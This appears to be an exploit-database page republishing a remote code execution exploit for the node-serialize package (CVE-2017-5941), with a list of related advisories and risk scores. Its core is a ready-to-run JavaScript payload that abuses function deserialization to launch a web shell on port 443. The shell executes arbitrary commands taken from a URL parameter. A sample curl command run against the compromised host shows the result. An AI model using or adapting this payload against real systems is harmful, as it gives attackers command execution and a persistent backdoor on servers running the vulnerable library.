Node.JS - (node-serialize) Remote Code Execution Exploit (3)

🗓️ 18 Jun 2021 00:00:00Reported by Beren Kuday GÖRÜNType

zdt🔗 0day.today👁 388 Views

Node.JS node-serialize Remote Code Execution Exploit CVE 2017-594

Reporter	Title	Published	Views	Family All 16
Circl	CVE-2017-5941	12 Oct 202515:00	–	circl
CNVD	Node-serialize Package For Node.js 'unserialize()' Function Arbitrary Code Execution Vulnerability	13 Feb 201700:00	–	cnvd
Check Point Advisories	Node.js Remote Code Execution (CVE-2017-5941)	24 Feb 202100:00	–	checkpoint_advisories
CVE	CVE-2017-5941	9 Feb 201719:00	–	cve
Cvelist	CVE-2017-5941	9 Feb 201719:00	–	cvelist
Exploit DB	Node.JS - 'node-serialize' Remote Code Execution (2)	10 Feb 202100:00	–	exploitdb
Github Security Blog	Code Execution through IIFE in node-serialize	18 Jul 201818:27	–	github
Node.js	Code Execution through IIFE	9 Feb 201716:30	–	nodejs
NVD	CVE-2017-5941	9 Feb 201719:59	–	nvd
OSV	CVE-2017-5941	9 Feb 201719:59	–	osv

# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (3)
# Exploit Author: Beren Kuday GORUN
# Vendor Homepage: https://github.com/luin/serialize
# Software Link: https://github.com/luin/serialize
# Version: 0.0.4
# Tested on: Windows & Ubuntu
# CVE : 2017-5941

var serialize = require('node-serialize');
var payload = {
    "webShell" : "_$$ND_FUNC$$_function(){const http = require('http'); const url = require('url'); const ps  = require('child_process'); http.createServer(function (req, res) { var queryObject = url.parse(req.url,true).query; var cmd = queryObject['cmd']; try { ps.exec(cmd, function(error, stdout, stderr) { res.end(stdout); }); } catch (error) { return; }}).listen(443); }()"
    }
serialize.unserialize(serialize.serialize(payload))

/*
# after being exploited

┌──([email protected])-[/home/kali]
└─# curl http://10.0.2.4:443?cmd=whoami
nodeadmin

*/

18 Jun 2021 00:00Current

9.6High risk

Vulners AI Score9.6

CVSS 27.5

CVSS 3.19.8

EPSS0.7793